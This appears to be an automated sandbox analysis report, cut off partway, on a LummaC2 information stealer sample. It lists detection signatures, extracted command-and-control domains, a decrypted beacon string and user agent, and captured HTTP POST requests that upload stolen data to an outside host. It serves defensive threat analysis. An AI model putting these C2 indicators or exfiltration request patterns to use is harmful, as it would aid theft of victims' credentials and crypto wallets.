Windows Analysis Report
0gnHF2twcT.exe

Overview

General Information

Sample name: 0gnHF2twcT.exe
renamed because original name is a hash value
Original sample name: 85bfde4071d80bb2bdffb80f68d54d17.exe
Analysis ID: 1579668
MD5: 85bfde4071d80bb2bdffb80f68d54d17
SHA1: d5f0c8caf84adc02892f6a3c2cbeeacca1379be5
SHA256: 945cc86dc25c7ac098e62ada6086c71aba93c5c9522076a0ed7923833cf5becb
Tags: exeuser-abuse_ch
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

barindex
Source: 0gnHF2twcT.exe Avira: detected
Source: 0gnHF2twcT.exe.1464.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "necklacebudi.lat", "aspecteirs.lat", "discokeyus.lat", "crosshuaht.lat", "rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "sweepyribs.lat"], "Build id": "PsFKDg--pablo"}
Source: 0gnHF2twcT.exe ReversingLabs: Detection: 57%
Source: 0gnHF2twcT.exe Virustotal: Detection: 54% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0gnHF2twcT.exe Joe Sandbox ML: detected
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: rapeflowwj.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: crosshuaht.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: sustainskelet.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: aspecteirs.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: energyaffai.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: necklacebudi.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: discokeyus.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: grannyejh.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: sweepyribs.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: PsFKDg--pablo
Source: 0gnHF2twcT.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: number of queries: 1001
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Packages Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Mozilla Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\3D Objects Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Comms Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google Jump to behavior

Networking

barindex
Source: Network traffic Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.8:59276 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.8:56152 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.8:57627 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.8:65050 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.8:59570 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.8:49500 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.8:61858 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.8:62061 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.8:60010 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49704 -> 23.55.153.106:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49706 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49713 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.66.86:443
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: sweepyribs.lat
Source: Joe Sandbox View IP Address: 104.21.66.86 104.21.66.86
Source: Joe Sandbox View IP Address: 23.55.153.106 23.55.153.106
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 23.55.153.106:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.66.86:443
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZKXX8IDAOM1N3IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12822Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KR0VE528KXPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15033Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RW4EII7M5UG7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20206Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=90K0SFJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1170Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=08RS2QQ5TDI6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588250Host: lev-tolstoi.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.0000000000A09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=16219b16eba2e1d25c63a86f; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 06:18:43 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://play equals www.youtube.com (Youtube)
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-srFc equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aspecteirs.lat:443/api
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.
